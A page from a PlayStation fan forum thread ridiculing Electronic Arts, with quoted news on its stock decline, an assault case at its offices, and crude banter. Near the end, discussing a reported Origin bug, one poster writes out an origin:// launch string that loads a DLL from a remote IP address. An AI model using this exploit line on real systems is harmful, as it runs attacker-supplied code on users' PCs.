Page 5 of 6 FirstFirst ... 3456 LastLast

EA Suicide Watch Thread - The company isn't sinking! It's a feature.

This is a discussion on EA Suicide Watch Thread - The company isn't sinking! It's a feature. within the General PS3 Discussion forum, part of the Everything PlayStation; Originally Posted by Gauss Most of what EA does wrong is post-consumer. will wrights spore. i will never forgive them ...

INTJ

Quote Originally Posted by Gauss View Post

Most of what EA does wrong is post-consumer.
    will wrights spore.

i will never forgive them for that.

Lvl 7 - Gold

Quote Originally Posted by dr_mayus View Post
    Actually it is more like "small publisher doesn't have the money and resources to become a big publisher. Small publisher fades into obscurity"

Let's face it, with out a big time publisher backing you that game of yours will never see commercial success (I know there are exceptions so please don't throw games like Minecraft at me)

Look at Unfinished Swan. That game was in development for 5 years before Sony came in with the money to get it made. Look at games like Bayonetta (a proven success), no one wanted to touch it so Nintendo had to come in a save it.

You may want EA gone, but you fail to realize that a lot of games would never see the big time if it wasn't for a company like EA.
    You've completely misunderstood what I said. I don't want EA gone at all. I don't want any game company gone. I was simply trying to point out that hoping for a companies demise is pointless because, one way or another, it's the gamers that get hurt in the end. I never have and never will spew about boycotting company X or company Y for any reason. If a game looks good I'll buy it regardless of who developed or distributed it.

INTJ

actually gamers will benefit from EA's demise simply because it will remove a massive amount of stagnation.

Lvl 3 - Bronze

Quote Originally Posted by Ps360 View Post
    actually gamers will benefit from EA's demise simply because it will remove a massive amount of stagnation.
    Why, the worthless husks that are Ubisoft and Activision would just as well take up EA's old job of catering to casuals.

Well they already do that, but someone would have to have to buy out EA's IP's.

I definitely wouldn't want Ubisoft making a Mirror's Edge sequel.
    Truly, we live in the age of shitty games.

INTJ

Cleaning Woman Raped by Security Guard at EA's Local Offices - Pacifica, CA Patch

According to the San Jose Mercury News, Raymond Nygard, 31, of Pacifica, who worked as a security guard for the EA building, sexually assaulted a cleaning woman in EA's offices after-hours on at least three occassions.

During one of the three incidents, Nygard raped the woman, and in the other two incidents, he forced her to perform oral sex. Nygard reportedly threatened to report the woman to immigration or have her fired if she did not comply.

EA Hires rapists as security guards

ok then

Lvl 9 - Gold

One thing I am really hating about EA right now is they never fix them damn servers. On FIFA 13 I can't seem to stay connected to football club for 5 mins and I'm getting fed up with seeing that error message pop up

Resident PHD

Well Nintendo hires children to make their systems, so I guess they are about equal.

Come on Noodles, seriously shut the fuck up already.

AWESOME SIG AND AVY BY ALISON CHECK OUT HER WORK HERE

Rangers F.C

Its a terrible act but not in anyway related to them as a company its bad on behalf of the people involved I don't think company policy is to hire rapists or intimidate people that have been raped
    Would like to thank Google and snipping tool for my amazing sig + avatar

I HAVE NEVER IN MY LIFE LEARNED ANYTHING FROM ANY MAN WHO AGREED WITH ME

To be conscious that you are ignorant of the facts is a great step to knowledge

Lvl 7 - Gold

EA hired a guy they didn't know had a rapist festering in him. Honestly, any company can (and I'm sure has on many many many other occasions) fall victim to an employee turning out to be a piece of shit. Saying "EA hires rapists" based on that story is obvious blind hatred, and comments like that are why you get so much shit flung at you on this site.

PRO Member

Im not a fan of EA however i must say Wow this may be one of the most unnecessary, stupid, and irrelavant statements to be connected to the bashing of a bad dev company! LOL Really 360 WTF? Your probly wrong because security is almost always contracted out by big companies and I can almost guarantee this guy didnt work for EA. Either way doesnt matter no one intentionally hired this guy to rape this woman!

Lvl 4 - Silver

I don't like EA and i hate them for many reasons but then they publish games that i really enjoy such as ME,SSX,Crysis,NFS,Burnout,Sabouteur,BF3. so i would not want them to crash and burn.
    But wtf Ps360 why are you coming up with some raping security guard bullshit

INTJ

Because that's EA's corporate policy, rape everyone

EA: Pac Crest Cuts to Hold Following ‘Unimaginable Disappointment’ - Tech Trader Daily - Barrons.com

Wilson writes, “This year we liked EA as a hated name, in a hated space with all-time low valuation. Unfortunately, we now think the consensus got this one right.

“In the past year, EA has sustained three unimaginably disappointing events that have crushed our confidence in its ability to develop hit games.”

In particular, Wilson cites the newest edition of Medal, which is “comprehensively bad”; the failure to drive subscriptions for “Star Wars“; and the failure to make any progress with “NBA Live.”

Wilson has rather scathing words for those mis-steps:

After seven years in development, EA launched Star Wars, which was one of its biggest bets ever, as has been widely reported. However, though it was likely the most expensive, longest-developed games of all time, players played through the content quickly and did not see the need to subscribe [...] The game now certainly is a huge loss in terms of ROIC [...] the NBA Live situation is also unimaginable. For two consecutive years, EA has failed to even develop a viable engine for an NBA game. It has planned and removed a holiday NBA release, and the future of the game is now in limbo.
    At the heart of the problem seems to be EA’s failure to “launch new IP [intellectual property] in video games,” writes Wilson, like it did in the last console cycle. With the exception of the “FIFA” soccer franchise, this year’s sports games have been “good” but haven’t pushed the ball forward, if you will, in his view.

Perhaps worse, he thinks, is EA’s failing to make good on promises in digitally downloaded games and casual, or social, games:

The low number of MoH sales this year should have a big negative effect on EA’s digital results, and it could set a new trajectory for its digital revenue. Battlefield 3 contributed at least $45 million in DLC revenue in F2012 and F2013. It also had a significant amount of sales through EA’s Origin digital download service. Our expectations for its social business have also gone down. EA was planning a big year in social games, which just has not transpired. Its launch of SimCity Social is officially a flop and PopCap has also pulled back on its slate of social releases. EA’s inability to gain traction in social is another example to us that its ability to innovate (rather than resting on its console sports laurels) is slipping.
    Wilson cut his estimate for this fiscal year ending in March to $3.99 billion in revenue from a prior $4.25 billion, and cut his EPS estimate to $1 from $1.15.

EA shares today fell 30 cents, or 2.5%, to close at $k11.91.

Lvl 9 - Gold

Because that's EA's corporate policy, rape everyone
    Your a fuckin idiot with that comment. Pathetic thing to say that it's EA's corporate policy to rape everyone. Obviously they didn't know he was a rapist.

INTJ

Quote Originally Posted by parkerdip View Post
    Pathetic thing to say that it's EA's corporate policy to rape everyone.
    Maxis, bioware, westwood, pandemic, bullfrog, etc. (soon dice and criterion will be added to that list)

Their IP's raped and then left for dead.

INTJ

RIM and Netflix dropped from NASDAQ-100 financial index as Facebook gains a seat | The Verge

The NASDAQ-100 (NDX) is a weighted stock market index of the largest non-financial companies in the world, and as the new year approaches, tech companies are playing musical chairs; NASDAQ has announced that Facebook will join the ranks, while Netflix, Electronic Arts, and RIM will drop from the index in 2013. The news isn't much of a surprise for Waterloo-based RIM, which has seen its stock tumble to new lows this year amid poor sales performance and gloomy projections for early next year. While the company still enjoys a strong international presence, RIM CEO Thorsten Heins acknowledged in November that RIM has "one shot" for recovery with its plan to launch BlackBerry 10 next year. Netflix has also endured a financial struggle since it segregated its DVD rental and streaming plans in 2011, and floated splitting the company in two, but the company has seen an upswing this year, reaching 25.1 million streaming subscribers in Q3 and a 10-percent increase in revenue over the prior year.

EA is afallin~

Resident PHD

Well what is interesting if I had to go by what games I have been selling the most of this last week I would say NHL 13, Madden 13, Need for Speed Most Wanted and Mass Effect Trilogy would rank in the top 10. So it seems EA is doing a lot better than other companies.

AWESOME SIG AND AVY BY ALISON CHECK OUT HER WORK HERE

Lvl 7 - Gold

"The news isn't much of a surprise for Waterloo-based RIM, which has seen its stock tumble to new lows this year amid poor sales performance and gloomy projections for early next year."

guess that means we can cue the RIM-shot.

PRO-M Thanks 2 NeroRadec!

March has been a brutal month for EA, where else to post more EA related crap than official FUCK EA thread.

Bug in EA’s Origin game platform allows attackers to hijack player PCs | Ars Technica

Talk about a rough month.

Signature by DaRe_xLw

INTJ

oh jee so i can just put this in someones computer

origin://LaunchGame/71503?CommandParams= -openautomate \\68.26.169.37\virus.dll

and it will download a fucking virus?

jesus.

PRO-M Thanks 2 NeroRadec!

& the grave gets deeper. lol.

EA Admits It “Can Do Better” But Blames Worst Company Success On Homophobes And Whiny Madden Fans

[top]EA Admits It “Can Do Better” But Blames Worst Company Success On Homophobes And Whiny Madden Fans

Signature by DaRe_xLw

Page 5 of 6 FirstFirst ... 3456 LastLast